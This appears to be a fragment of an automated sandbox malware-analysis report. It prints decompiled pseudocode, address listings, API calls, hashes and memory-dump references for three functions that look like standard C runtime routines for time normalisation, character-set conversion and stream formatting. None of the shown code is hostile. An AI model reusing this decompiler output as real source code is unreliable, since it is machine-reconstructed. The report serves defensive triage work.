    • Instruction ID: c6c774969321fb0b61d57012a1faad262c914112f341ade4dd921d3badc6bec4
    • Opcode Fuzzy Hash: 8150f2849fa73c3c1386e614bce17a8c7f263fcc3cf36198d2fcf3c8acff8a63
    • Instruction Fuzzy Hash: EF116D76545B4CEBEA31AFF0CC05FCB77FE5F04745F408C14A39A662A4DB64A6484A50
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E20A541, Relevance: 9.3, APIs: 6, Instructions: 284COMMON
    Download Yara Rule
    C-Code - Quality: 71%
    			E6E20A541(void* __ebx, signed int __edx, void* __edi, void* _a4, signed int _a8) {
				intOrPtr _v0;
				char _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v24;
				void* __esi;
				void* __ebp;
				signed int _t61;
				void* _t64;
				signed int _t67;
				signed int _t69;
				signed int _t70;
				signed int _t73;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				intOrPtr _t80;
				signed int _t81;
				void* _t82;
				signed int _t84;
				void* _t85;
				signed int _t87;
				signed int _t93;
				signed int _t102;
				void* _t104;
				signed int _t107;
				signed int* _t110;
				signed int* _t111;
				intOrPtr* _t113;
				signed int _t118;
				signed int _t120;
				signed int _t123;
				void* _t125;
				signed int _t128;
				void* _t130;
				signed int _t131;
				void* _t135;
				signed int _t139;
				signed int _t145;
				void _t147;
				void* _t148;
				void* _t150;
				void* _t152;
				signed int _t153;
				signed int _t154;
				void* _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;

				_t139 = __edx;
				_t155 = _a4;
				if(_t155 == 0) {
					_t113 = E6E20BB7E();
					_t159 = 0x16;
					 *_t113 = _t159;
					E6E208929();
					return _t159;
				}
				_push(__edi);
				_t123 = 9;
				memset(_t155, _t61 | 0xffffffff, _t123 << 2);
				_t145 = _a8;
				__eflags = _t145;
				if(_t145 == 0) {
					_t111 = E6E20BB7E();
					_t158 = 0x16;
					 *_t111 = _t158;
					E6E208929();
					_t78 = _t158;
					L12:
					return _t78;
				}
				_push(__ebx);
				__eflags =  *(_t145 + 4);
				if(__eflags <= 0) {
					if(__eflags < 0) {
						L10:
						_t110 = E6E20BB7E();
						_t157 = 0x16;
						 *_t110 = _t157;
						_t78 = _t157;
						L11:
						goto L12;
					}
					__eflags =  *_t145;
					if( *_t145 < 0) {
						goto L10;
					}
				}
				_t64 = 7;
				__eflags =  *(_t145 + 4) - _t64;
				if(__eflags >= 0) {
					if(__eflags > 0) {
						goto L10;
					}
					__eflags =  *_t145 - 0x93406fff;
					if(__eflags > 0) {
						goto L10;
					}
				}
				E6E213419(0, 0, _t139, _t145, _t155, __eflags);
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				_t67 = E6E212C4E( &_v12);
				_pop(_t125);
				__eflags = _t67;
				if(_t67 == 0) {
					_t75 = E6E212C7A( &_v16);
					_pop(_t125);
					__eflags = _t75;
					if(_t75 == 0) {
						_t77 = E6E212CA6( &_v8);
						_pop(_t125);
						__eflags = _t77;
						if(_t77 == 0) {
							_t118 =  *(_t145 + 4);
							_t128 =  *_t145;
							__eflags = _t118;
							if(__eflags < 0) {
								L28:
								_push(_t145);
								_t78 = E6E20A536();
								_t130 = _t155;
								__eflags = _t78;
								if(_t78 != 0) {
									goto L11;
								}
								__eflags = _v12;
								asm("cdq");
								_t147 =  *_t155;
								_t120 = _t139;
								if(__eflags == 0) {
									L32:
									_t80 = _v8;
									L33:
									asm("cdq");
									_t148 = _t147 - _t80;
									asm("sbb ebx, edx");
									_t81 = E6E21F470(_t148, _t120, 0x3c, 0);
									 *_t155 = _t81;
									__eflags = _t81;
									if(_t81 < 0) {
										_t148 = _t148 + 0xffffffc4;
										 *_t155 = _t81 + 0x3c;
										asm("adc ebx, 0xffffffff");
									}
									_t82 = E6E21F3C0(_t148, _t120, 0x3c, 0);
									_t121 = _t139;
									asm("cdq");
									_t150 = _t82 +  *(_t155 + 4);
									asm("adc ebx, edx");
									_t84 = E6E21F470(_t150, _t139, 0x3c, 0);
									 *(_t155 + 4) = _t84;
									__eflags = _t84;
									if(_t84 < 0) {
										_t150 = _t150 + 0xffffffc4;
										 *(_t155 + 4) = _t84 + 0x3c;
										asm("adc ebx, 0xffffffff");
									}
									_t85 = E6E21F3C0(_t150, _t121, 0x3c, 0);
									_t122 = _t139;
									asm("cdq");
									_t152 = _t85 +  *(_t155 + 8);
									asm("adc ebx, edx");
									_t87 = E6E21F470(_t152, _t139, 0x18, 0);
									 *(_t155 + 8) = _t87;
									__eflags = _t87;
									if(_t87 < 0) {
										_t152 = _t152 + 0xffffffe8;
										 *(_t155 + 8) = _t87 + 0x18;
										asm("adc ebx, 0xffffffff");
									}
									_t131 = E6E21F3C0(_t152, _t122, 0x18, 0);
									__eflags = _t139;
									if(__eflags < 0) {
										L48:
										 *(_t155 + 0xc) =  *(_t155 + 0xc) + _t131;
										asm("cdq");
										_t153 = 7;
										_t93 =  *(_t155 + 0xc);
										 *(_t155 + 0x18) = ( *(_t155 + 0x18) + 7 + _t131) % _t153;
										__eflags = _t93;
										if(_t93 > 0) {
											goto L43;
										}
										 *((intOrPtr*)(_t155 + 0x10)) = 0xb;
										 *(_t155 + 0xc) = _t93 + 0x1f;
										_t55 = _t131 + 0x16d; // 0x16d
										 *(_t155 + 0x1c) =  *(_t155 + 0x1c) + _t55;
										 *((intOrPtr*)(_t155 + 0x14)) =  *((intOrPtr*)(_t155 + 0x14)) - 1;
										goto L44;
									} else {
										if(__eflags > 0) {
											L42:
											asm("cdq");
											_t154 = 7;
											_t39 = _t155 + 0xc;
											 *_t39 =  *(_t155 + 0xc) + _t131;
											__eflags =  *_t39;
											 *(_t155 + 0x18) = ( *(_t155 + 0x18) + _t131) % _t154;
											L43:
											_t42 = _t155 + 0x1c;
											 *_t42 =  *(_t155 + 0x1c) + _t131;
											__eflags =  *_t42;
											L44:
											_t78 = 0;
											goto L11;
										}
										__eflags = _t131;
										if(_t131 == 0) {
											__eflags = _t139;
											if(__eflags > 0) {
												goto L44;
											}
											if(__eflags < 0) {
												goto L48;
											}
											__eflags = _t131;
											if(_t131 >= 0) {
												goto L44;
											}
											goto L48;
										}
										goto L42;
									}
								}
								_push(_t155);
								_t102 = E6E21346A(_t120, _t130, _t139, _t147, _t155, __eflags);
								__eflags = _t102;
								if(_t102 == 0) {
									goto L32;
								}
								_t80 = _v8 + _v16;
								 *((intOrPtr*)(_t155 + 0x20)) = 1;
								goto L33;
							}
							if(__eflags > 0) {
								L20:
								_t104 = 7;
								__eflags = _t118 - _t104;
								if(__eflags > 0) {
									goto L28;
								}
								if(__eflags < 0) {
									L23:
									asm("cdq");
									_push( &_v24);
									asm("sbb ebx, edx");
									_v24 = _t128 - _v8;
									_v20 = _t118;
									_t78 = E6E20A536();
									_t135 = _t155;
									__eflags = _t78;
									if(_t78 != 0) {
										goto L11;
									}
									__eflags = _v12 - _t78;
									if(__eflags == 0) {
										goto L44;
									}
									_push(_t155);
									_t107 = E6E21346A(_t118, _t135, _t139, _t145, _t155, __eflags);
									__eflags = _t107;
									if(_t107 == 0) {
										goto L44;
									}
									asm("cdq");
									_v24 = _v24 - _v16;
									_push( &_v24);
									asm("sbb [ebp-0x10], edx");
									_push(_t155);
									_t78 = E6E20A536();
									__eflags = _t78;
									if(_t78 != 0) {
										goto L11;
									}
									 *((intOrPtr*)(_t155 + 0x20)) = 1;
									goto L44;
								}
								__eflags = _t128 - 0x933c7b7f;
								if(_t128 >= 0x933c7b7f) {
									goto L28;
								}
								goto L23;
							}
							__eflags = _t128 - 0x3f480;
							if(_t128 <= 0x3f480) {
								goto L28;
							}
							goto L20;
						}
					}
				}
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				E6E208956();
				asm("int3");
				_push(_t155);
				_t69 = E6E20A4D1(_t125);
				_t156 = _t69;
				__eflags = _t156;
				if(_t156 != 0) {
					_push(_v0);
					_t70 = E6E20A541(0, _t139, _t145, _t156);
					asm("sbb eax, eax");
					_t73 =  !( ~_t70) & _t156;
					__eflags = _t73;
					return _t73;
				}
				return _t69;
			}






















































    0x6e20a541
    0x6e20a54a
    0x6e20a54f
    0x6e20a551
    0x6e20a558
    0x6e20a559
    0x6e20a55b
    0x00000000
    0x6e20a560
    0x6e20a564
    0x6e20a56c
    0x6e20a56d
    0x6e20a56f
    0x6e20a572
    0x6e20a574
    0x6e20a576
    0x6e20a57d
    0x6e20a57e
    0x6e20a580
    0x6e20a585
    0x6e20a5b6
    0x00000000
    0x6e20a5b6
    0x6e20a589
    0x6e20a58c
    0x6e20a58f
    0x6e20a591
    0x6e20a5a9
    0x6e20a5a9
    0x6e20a5b0
    0x6e20a5b1
    0x6e20a5b3
    0x6e20a5b5
    0x00000000
    0x6e20a5b5
    0x6e20a593
    0x6e20a595
    0x00000000
    0x00000000
    0x6e20a595
    0x6e20a599
    0x6e20a59a
    0x6e20a59d
    0x6e20a59f
    0x00000000
    0x00000000
    0x6e20a5a1
    0x6e20a5a7
    0x00000000
    0x00000000
    0x6e20a5a7
    0x6e20a5bc
    0x6e20a5c4
    0x6e20a5c8
    0x6e20a5cb
    0x6e20a5ce
    0x6e20a5d3
    0x6e20a5d4
    0x6e20a5d6
    0x6e20a5e0
    0x6e20a5e5
    0x6e20a5e6
    0x6e20a5e8
    0x6e20a5f2
    0x6e20a5f7
    0x6e20a5f8
    0x6e20a5fa
    0x6e20a600
    0x6e20a603
    0x6e20a605
    0x6e20a607
    0x6e20a688
    0x6e20a688
    0x6e20a68a
    0x6e20a690
    0x6e20a691
    0x6e20a693
    0x00000000
    0x00000000
    0x6e20a699
    0x6e20a69f
    0x6e20a6a0
    0x6e20a6a2
    0x6e20a6a4
    0x6e20a6c0
    0x6e20a6c0
    0x6e20a6c3
    0x6e20a6c3
    0x6e20a6c4
    0x6e20a6ca
    0x6e20a6ce
    0x6e20a6d3
    0x6e20a6d5
    0x6e20a6d7
    0x6e20a6dc
    0x6e20a6df
    0x6e20a6e1
    0x6e20a6e1
    0x6e20a6ea
    0x6e20a6f1
    0x6e20a6f6
    0x6e20a6f7
    0x6e20a6fd
    0x6e20a701
    0x6e20a706
    0x6e20a709
    0x6e20a70b
    0x6e20a710
    0x6e20a713
    0x6e20a716
    0x6e20a716
    0x6e20a71f
    0x6e20a726
    0x6e20a72b
    0x6e20a72c
    0x6e20a732
    0x6e20a736
    0x6e20a73b
    0x6e20a73e
    0x6e20a740
    0x6e20a745
    0x6e20a748
    0x6e20a74b
    0x6e20a74b
    0x6e20a759
    0x6e20a75b
    0x6e20a75d
    0x6e20a78a
    0x6e20a790
    0x6e20a797
    0x6e20a798
    0x6e20a79b
    0x6e20a79e
    0x6e20a7a1
    0x6e20a7a3
    0x00000000
    0x00000000
    0x6e20a7a8
    0x6e20a7af
    0x6e20a7b2
    0x6e20a7b8
    0x6e20a7bb
    0x00000000
    0x6e20a75f
    0x6e20a75f
    0x6e20a765
    0x6e20a76c
    0x6e20a76d
    0x6e20a770
    0x6e20a770
    0x6e20a770
    0x6e20a773
    0x6e20a776
    0x6e20a776
    0x6e20a776
    0x6e20a776
    0x6e20a779
    0x6e20a779
    0x00000000
    0x6e20a779
    0x6e20a761
    0x6e20a763
    0x6e20a780
    0x6e20a782
    0x00000000
    0x00000000
    0x6e20a784
    0x00000000
    0x00000000
    0x6e20a786
    0x6e20a788
    0x00000000
    0x00000000
    0x00000000
    0x6e20a788
    0x00000000
    0x6e20a763
    0x6e20a75d
    0x6e20a6a6
    0x6e20a6a7
    0x6e20a6ad
    0x6e20a6af
    0x00000000
    0x00000000
    0x6e20a6b4
    0x6e20a6b7
    0x00000000
    0x6e20a6b7
    0x6e20a609
    0x6e20a613
    0x6e20a615
    0x6e20a616
    0x6e20a618
    0x00000000
    0x00000000
    0x6e20a61a
    0x6e20a624
    0x6e20a627
    0x6e20a62d
    0x6e20a62e
    0x6e20a630
    0x6e20a634
    0x6e20a637
    0x6e20a63d
    0x6e20a63e
    0x6e20a640
    0x00000000
    0x00000000
    0x6e20a646
    0x6e20a649
    0x00000000
    0x00000000
    0x6e20a64f
    0x6e20a650
    0x6e20a656
    0x6e20a658
    0x00000000
    0x00000000
    0x6e20a661
    0x6e20a662
    0x6e20a668
    0x6e20a669
    0x6e20a66c
    0x6e20a66d
    0x6e20a674
    0x6e20a676
    0x00000000
    0x00000000
    0x6e20a67c
    0x00000000
    0x6e20a67c
    0x6e20a61c
    0x6e20a622
    0x00000000
    0x00000000
    0x00000000
    0x6e20a622
    0x6e20a60b
    0x6e20a611
    0x00000000
    0x00000000
    0x00000000
    0x6e20a611
    0x6e20a5fa
    0x6e20a5e8
    0x6e20a7c0
    0x6e20a7c1
    0x6e20a7c2
    0x6e20a7c3
    0x6e20a7c4
    0x6e20a7c5
    0x6e20a7ca
    0x6e20a7d0
    0x6e20a7d1
    0x6e20a7d6
    0x6e20a7d8
    0x6e20a7da
    0x6e20a7dc
    0x6e20a7e0
    0x6e20a7e8
    0x6e20a7ed
    0x6e20a7ed
    0x00000000
    0x6e20a7ed
    0x6e20a7f1

    APIs
    • __allrem.LIBCMT ref: 6E20A6CE
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E20A6EA
    • __allrem.LIBCMT ref: 6E20A701
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E20A71F
    • __allrem.LIBCMT ref: 6E20A736
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E20A754
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
    • String ID:
    • API String ID: 1992179935-0
    • Opcode ID: 520504b090bb9cb9546ed9ea6a19a6dcf88f552744e81d20fbdc98606b361ce4
    • Instruction ID: 48f9f67dc6150976152e87142d69ea52b2ebb0a4e75cbfc224c549984c78b8cb
    • Opcode Fuzzy Hash: 520504b090bb9cb9546ed9ea6a19a6dcf88f552744e81d20fbdc98606b361ce4
    • Instruction Fuzzy Hash: 8681F5F6A0170E9BE7118EE9CC40B9E77FEAF41364F50892AE515D66D0EB70D9004B90
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E215D99, Relevance: 9.2, APIs: 6, Instructions: 216COMMON
    Download Yara Rule
    C-Code - Quality: 65%
    			E6E215D99(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x6e24b164; // 0x1dc3c76f
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E6E20CE7E(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E6E203D51(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E6E2035A7(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E6E213BB7(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E6E2035A7(_t101);
									goto L36;
								}
								_t62 = E6E213BB7(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E6E2035A7(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E6E20FBEC(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E6E204540();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E6E213BB7(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E6E20FBEC(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E6E204540();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}


























    0x6e215d9e
    0x6e215d9f
    0x6e215da0
    0x6e215da7
    0x6e215dab
    0x6e215dac
    0x6e215db2
    0x6e215db8
    0x6e215dbe
    0x6e215dc1
    0x6e215dc1
    0x6e215dc4
    0x6e215dc6
    0x6e215dc6
    0x6e215dc4
    0x6e215dc8
    0x6e215dcd
    0x6e215dd4
    0x6e215dd7
    0x6e215dd7
    0x6e215df3
    0x6e215df9
    0x6e215dfe
    0x6e215f91
    0x6e215fa4
    0x6e215e04
    0x6e215e04
    0x6e215e07
    0x6e215e0c
    0x6e215e10
    0x6e215e64
    0x6e215e64
    0x6e215e66
    0x6e215e68
    0x6e215f86
    0x6e215f86
    0x6e215f88
    0x6e215f89
    0x00000000
    0x6e215f8f
    0x6e215e79
    0x6e215e7f
    0x6e215e81
    0x00000000
    0x00000000
    0x6e215e87
    0x6e215e99
    0x6e215e9e
    0x6e215ea2
    0x00000000
    0x00000000
    0x6e215eaf
    0x6e215ee9
    0x6e215eec
    0x6e215eef
    0x6e215ef1
    0x6e215ef3
    0x6e215ef5
    0x6e215f41
    0x6e215f41
    0x6e215f43
    0x6e215f43
    0x6e215f45
    0x6e215f7f
    0x6e215f80
    0x00000000
    0x6e215f85
    0x6e215f59
    0x6e215f5e
    0x6e215f60
    0x00000000
    0x00000000
    0x6e215f64
    0x6e215f65
    0x6e215f66
    0x6e215f69
    0x6e215fa5
    0x6e215fa8
    0x6e215f6b
    0x6e215f6b
    0x6e215f6c
    0x6e215f6c
    0x6e215f79
    0x6e215f7b
    0x6e215f7d
    0x6e215fae
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e215f7d
    0x6e215ef7
    0x6e215efa
    0x6e215efc
    0x6e215efe
    0x6e215f00
    0x6e215f03
    0x6e215f08
    0x6e215f23
    0x6e215f25
    0x6e215f2f
    0x6e215f31
    0x6e215f32
    0x6e215f34
    0x00000000
    0x00000000
    0x6e215f36
    0x6e215f3c
    0x6e215f3c
    0x00000000
    0x6e215f3c
    0x6e215f0a
    0x6e215f0c
    0x6e215f10
    0x6e215f15
    0x6e215f17
    0x6e215f19
    0x00000000
    0x00000000
    0x6e215f1b
    0x00000000
    0x6e215f1b
    0x6e215eb1
    0x6e215eb6
    0x00000000
    0x00000000
    0x6e215ebc
    0x6e215ebe
    0x00000000
    0x00000000
    0x6e215ed5
    0x6e215eda
    0x6e215ede
    0x00000000
    0x00000000
    0x00000000
    0x6e215ee4
    0x6e215e17
    0x6e215e19
    0x6e215e1b
    0x6e215e23
    0x6e215e42
    0x6e215e44
    0x6e215e4e
    0x6e215e50
    0x6e215e51
    0x6e215e53
    0x00000000
    0x00000000
    0x6e215e59
    0x6e215e5f
    0x6e215e5f
    0x00000000
    0x6e215e5f
    0x6e215e27
    0x6e215e2b
    0x6e215e30
    0x6e215e34
    0x00000000
    0x00000000
    0x6e215e3a
    0x00000000
    0x6e215e3a

    APIs
    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,6E209ACC,6E209ACC,?,?,?,6E215FEA,00000001,00000001,82E85006), ref: 6E215DF3
    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,6E215FEA,00000001,00000001,82E85006,?,?,?), ref: 6E215E79
    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,82E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6E215F73
    • __freea.LIBCMT ref: 6E215F80
      • Part of subcall function 6E20FBEC: HeapAlloc.KERNEL32(00000000,0000060B,?,?,6E203D1F,0000060B,?,6E1F73C4,0000060B), ref: 6E20FC1E
    • __freea.LIBCMT ref: 6E215F89
    • __freea.LIBCMT ref: 6E215FAE
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ByteCharMultiWide__freea$AllocHeap
    • String ID:
    • API String ID: 3147120248-0
    • Opcode ID: dd0dba318779686905b582fea46d7ef234cc4a25036611fdb95598ed2a5ce2b3
    • Instruction ID: c7208251c8c7b6d3524d299b00ae807ee9b7812c688c5de6a6ccbe65ee76beca
    • Opcode Fuzzy Hash: dd0dba318779686905b582fea46d7ef234cc4a25036611fdb95598ed2a5ce2b3
    • Instruction Fuzzy Hash: AE51037265824BAFEB148EE4CC44EEB77EBEF55650F1046A8FE14D6180EB34DE40C690
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E2008B0, Relevance: 9.2, APIs: 6, Instructions: 186COMMON
    Download Yara Rule
    C-Code - Quality: 81%
    			E6E2008B0(intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, signed int _a24) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				char _v44;
				char _v68;
				char _v92;
				intOrPtr* _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				char _v140;
				char _v148;
				char _v156;
				signed int _t86;
				signed int _t87;
				intOrPtr _t93;
				signed int _t101;
				void* _t103;
				intOrPtr* _t107;
				intOrPtr* _t117;
				void* _t118;
				void* _t119;
				void* _t120;
				signed int _t171;
				signed int _t188;
				void* _t189;
				void* _t190;
				void* _t191;

				_push(0xffffffff);
				_push(0x6e21ff73);
				_push( *[fs:0x0]);
				_t190 = _t189 - 0x8c;
				_t86 =  *0x6e24b164; // 0x1dc3c76f
				_t87 = _t86 ^ _t188;
				_v20 = _t87;
				_push(_t87);
				 *[fs:0x0] =  &_v16;
				_v96 = __ecx;
				if((E6E200E40(_a16) & 0x00004000) != 0) {
					_v112 = E6E200F40(_a16, __eflags,  &_v140);
					_v116 = _v112;
					_v8 = 0;
					_t93 = E6E1F9990(__edi, __eflags, _v116);
					_t191 = _t190 + 4;
					_v104 = _t93;
					_v8 = 0xffffffff;
					E6E1FAA70( &_v140);
					E6E1F9D30();
					_v8 = 1;
					__eflags = _a24 & 0x000000ff;
					if((_a24 & 0x000000ff) == 0) {
						_v124 = E6E200DE0(_v104,  &_v92);
						_t171 = _v124;
						E6E1FFD80( &_v44, _t171);
						E6E1FA720();
					} else {
						_t171 =  &_v68;
						_v120 = E6E201590(_v104, _t171);
						E6E1FFD80( &_v44, _v120);
						E6E1FA720();
					}
					_v132 = E6E201680(_a16);
					_v128 = _t171;
					__eflags = _v128;
					if(__eflags < 0) {
						L10:
						_v108 = 0;
					} else {
						if(__eflags > 0) {
							L8:
							_t118 = E6E201680(_a16);
							_t119 = E6E2010F0( &_v44);
							__eflags = _t118 - _t119;
							if(_t118 <= _t119) {
								goto L10;
							} else {
								_t120 = E6E201680(_a16);
								_v108 = _t120 - E6E2010F0( &_v44);
							}
						} else {
							__eflags = _v132;
							if(_v132 <= 0) {
								goto L10;
							} else {
								goto L8;
							}
						}
					}
					_v100 = _v108;
					_t101 = E6E200E40(_a16);
					__eflags = (_t101 & 0x000001c0) - 0x40;
					if((_t101 & 0x000001c0) != 0x40) {
						_t117 = E6E1FF450(_v96,  &_v148, _a8, _a12, _a20 & 0x000000ff, _v100);
						_t191 = _t191 + 0x18;
						_a8 =  *_t117;
						_a12 =  *((intOrPtr*)(_t117 + 4));
						_v100 = 0;
					}
					_t103 = E6E2010F0( &_v44);
					_t107 = E6E1FF400(_v96,  &_v156, _a8, _a12, E6E1FFF60(), _t103);
					_a8 =  *_t107;
					_a12 =  *((intOrPtr*)(_t107 + 4));
					E6E201640(_a16, 0, 0);
					E6E1FF450(_v96, _a4, _a8, _a12, _a20 & 0x000000ff, _v100);
					_v8 = 0xffffffff;
					E6E1FA720();
				} else {
					 *((intOrPtr*)( *((intOrPtr*)( *_v96 + 0x24))))(_a4, _a8, _a12, _a16, _a20 & 0x000000ff, _a24 & 0x000000ff);
				}
				 *[fs:0x0] = _v16;
				return E6E203D51(_v20 ^ _t188);
			}





































    0x6e2008b3
    0x6e2008b5
    0x6e2008c0
    0x6e2008c1
    0x6e2008c7
    0x6e2008cc
    0x6e2008ce
    0x6e2008d2
    0x6e2008d6
    0x6e2008dc
    0x6e2008ec
    0x6e200931
    0x6e200937
    0x6e20093a
    0x6e200945
    0x6e20094a
    0x6e20094d
    0x6e200950
    0x6e20095d
    0x6e200965
    0x6e20096a
    0x6e200975
    0x6e200977
    0x6e2009aa
    0x6e2009ad
    0x6e2009b4
    0x6e2009bc
    0x6e200979
    0x6e200979
    0x6e200985
    0x6e20098f
    0x6e200997
    0x6e200997
    0x6e2009c9
    0x6e2009cc
    0x6e2009cf
    0x6e2009d3
    0x6e200a0c
    0x6e200a0c
    0x6e2009d5
    0x6e2009d5
    0x6e2009dd
    0x6e2009e0
    0x6e2009ea
    0x6e2009ef
    0x6e2009f1
    0x00000000
    0x6e2009f3
    0x6e2009f6
    0x6e200a07
    0x6e200a07
    0x6e2009d7
    0x6e2009d7
    0x6e2009db
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e2009db
    0x6e2009d5
    0x6e200a16
    0x6e200a1c
    0x6e200a26
    0x6e200a29
    0x6e200a47
    0x6e200a4c
    0x6e200a54
    0x6e200a57
    0x6e200a5a
    0x6e200a5a
    0x6e200a64
    0x6e200a86
    0x6e200a93
    0x6e200a96
    0x6e200aa0
    0x6e200abe
    0x6e200ac6
    0x6e200ad0
    0x6e2008ee
    0x6e200913
    0x6e200915
    0x6e200adb
    0x6e200af1

    APIs
    Memory Dump Source
